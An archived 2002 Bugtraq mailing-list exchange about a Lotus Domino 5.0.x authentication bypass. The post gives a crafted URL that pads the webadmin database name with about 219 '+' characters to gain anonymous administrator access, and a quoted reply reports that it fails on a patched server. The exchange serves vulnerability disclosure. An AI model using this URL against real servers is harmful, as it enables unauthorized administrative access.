http://www.xxxx.com/webadmin.ntf++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++.nsf/ Get in like an Anonimous access, tested with a 219 buffer caracters exactly - 5.0.8 version - But, in the version 5.0.4 dsnīt work: Dominio web administrator is unable to run The database "webadmin.nsf" needs to be signed with and ID file wich is granted "Run unrestricted Lotuscript/Java agents". CyRaNo www.heinekenteam.com Carolyn Meinel fanīs club ----- Original Message ----- From: <j.mickertsat_private> To: <gmaggiotat_private> Cc: <bugtraqat_private>; <gabiat_private>; <vuln-devat_private> Sent: Monday, February 04, 2002 5:35 AM Subject: Antwort: Lotus Domino url bypass > Hi, > > this does not work for me. I tested it against Domino 5.0.8 on Windows > 2000 SP2 with all actual patches. I get redirected to the login-page. How > are your ACLs on the template? Mine do not allow Anonymous or Default any > access. Maybe this corrects the issue. I also use SSL to connect, but this > should not interfere with the exploit. Maybe you should state version and > platform. > > Kind regards, > > Jens Mickerts
This archive was generated by hypermail 2b30 : Mon Feb 04 2002 - 12:27:38 PST